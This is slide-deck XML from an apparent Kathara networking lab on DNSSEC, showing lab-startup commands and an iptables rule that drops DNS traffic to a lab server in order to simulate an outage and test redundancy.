            <a:chExt cx="10972800" cy="1237207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B6C54B1-596A-420D-BE3E-624301D1AB7D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="607480" y="2668294"/>
              <a:ext cx="10972799" cy="947758"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="40000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="t"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>user@localhost</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:~$ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cd </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara-dnssec</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>user@localhost</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:~/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara-dnssec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>$ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lstart</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEE96BD1-C4D2-6E23-90BD-DCBD223DA445}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="607480" y="2378845"/>
              <a:ext cx="10972800" cy="289449"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4472C4"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="25400" algn="l" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="32000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="34" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82D85723-4E68-7E61-83A1-0BA5E38655B0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10920536" y="2466851"/>
              <a:ext cx="581348" cy="126235"/>
              <a:chOff x="8092857" y="2115830"/>
              <a:chExt cx="581348" cy="126235"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="37" name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D81260EE-72B0-A213-27C8-009559942357}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8548205" y="2116065"/>
                <a:ext cx="126000" cy="126000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000">
                  <a:alpha val="50196"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="4472C4">
                    <a:shade val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C60B490-F811-7FCA-2814-F665B2F860E2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8092857" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31782F88-E9AB-9E80-EB1F-5666A95DA49D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8320531" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39443199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8D0C32-222E-BD15-DA42-B9489FBF8A7D}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5122" name="Rectangle 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5CC85EC-F036-F8BF-4A25-5FA6D54B8DE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attack simulation with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and redundancy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Subtitle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{034F9E9A-3436-B2A8-9130-1AF7112E458C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA0ACA4F-0F0E-2CD3-157F-BECE59EE6F09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A31954C4-2A95-899D-7347-1FF159FBF46E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="255960625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BB6AEC-BD7E-AB9C-3CDC-A960BFD8486F}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16386" name="Titolo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C42B1A9-3BA0-C670-92C6-37E375E6E65D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>iptables command</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A60ABFF6-796E-780B-93EC-2E6983413C91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>on r2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>block incoming DNS traffic in r2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>look at eth and loopback interfaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6708D92-9940-DA73-5FE6-D701B5DA3B4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D151712-9266-4D21-E499-04474F090491}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E31954C7-AB54-3C75-AD83-99C55420048C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2223422" y="3133725"/>
            <a:ext cx="7745155" cy="2697167"/>
            <a:chOff x="4014773" y="2378845"/>
            <a:chExt cx="7565509" cy="2825300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FC3AEA3-F2B4-BF16-D4D7-ACE97AFCCC46}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4014776" y="2632080"/>
              <a:ext cx="7565506" cy="2572065"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="40000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="t"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@r2:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" noProof="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>tables –A FORWARD –d 110.0.0.10 –p </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>udp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> --</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dport</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 53 –j DROP</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6D912BC-4E60-625F-B7C2-EB0AAFBC3BDB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4014773" y="2378845"/>
              <a:ext cx="7565506" cy="286249"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4472C4"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="25400" algn="l" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="32000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" kern="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:rPr>
                <a:t>r2</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
